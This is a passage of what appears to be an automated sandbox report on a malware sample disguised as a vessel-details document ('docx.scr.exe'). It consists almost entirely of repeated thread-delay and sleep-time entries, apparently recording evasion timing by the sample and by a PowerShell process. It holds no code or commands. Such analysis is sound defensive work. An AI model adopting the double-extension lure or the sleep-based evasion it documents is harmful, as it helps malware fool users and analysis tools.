                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 239890Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 239778Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 239672Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 239560Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 239449Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 239343Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 239234Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 239125Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 238989Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 238875Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 238747Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 238641Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 238510Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 238323Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 237988Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 237797Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 237650Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 237546Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 237398Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 599843Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 599718Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 599606Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 599492Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 599375Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 599265Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 599156Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 599046Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 598937Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 598828Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 598718Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 598609Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 598499Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 598390Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 598281Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 598167Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 598046Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 597937Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 597815Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 597687Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 597578Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 597468Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 597359Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 597249Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 597140Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 597030Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 596921Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 596804Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 596694Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 596532Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 596406Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 596296Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 596187Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 596077Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 595968Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 595859Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 595749Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 595640Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 595531Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 595421Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 595312Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 595203Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 595093Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 594984Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 594874Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 594765Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 594654Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 594546Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 594437Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 594327Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeWindow / User API: threadDelayed 1175Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeWindow / User API: threadDelayed 2105Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1957Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 824Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeWindow / User API: threadDelayed 2187Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeWindow / User API: threadDelayed 7664Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796Thread sleep time: -239890s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796Thread sleep time: -239778s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796Thread sleep time: -239672s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796Thread sleep time: -239560s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796Thread sleep time: -239449s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796Thread sleep time: -239343s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796Thread sleep time: -239234s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796Thread sleep time: -239125s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796Thread sleep time: -238989s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796Thread sleep time: -238875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796Thread sleep time: -238747s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796Thread sleep time: -238641s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796Thread sleep time: -238510s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796Thread sleep time: -238323s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796Thread sleep time: -237988s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796Thread sleep time: -237797s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796Thread sleep time: -237650s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796Thread sleep time: -237546s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796Thread sleep time: -237398s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7216Thread sleep count: 1957 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7204Thread sleep count: 824 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7252Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep count: 36 > 30Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7348Thread sleep count: 2187 > 30Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -599843s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7348Thread sleep count: 7664 > 30Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -599718s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -599606s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -599492s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -599375s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -599265s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -599156s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -599046s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -598937s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -598828s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -598718s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -598609s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -598499s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -598390s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -598281s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -598167s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -598046s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -597937s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -597815s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -597687s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -597578s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -597468s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -597359s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -597249s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -597140s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -597030s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -596921s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -596804s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -596694s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -596532s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -596406s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -596296s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -596187s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -596077s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -595968s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -595859s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -595749s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -595640s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -595531s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -595421s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -595312s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -595203s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -595093s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -594984s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -594874s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -594765s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -594654s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -594546s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -594437s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344Thread sleep time: -594327s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 240000Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 239890Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 239778Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 239672Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 239560Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 239449Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 239343Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 239234Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 239125Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 238989Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 238875Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 238747Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 238641Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 238510Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 238323Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 237988Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 237797Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 237650Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 237546Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 237398Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 599843Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 599718Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 599606Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 599492Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 599375Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 599265Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 599156Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 599046Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 598937Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 598828Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 598718Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 598609Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 598499Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 598390Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 598281Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 598167Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 598046Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 597937Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 597815Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 597687Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 597578Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 597468Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 597359Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 597249Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 597140Jump to behavior
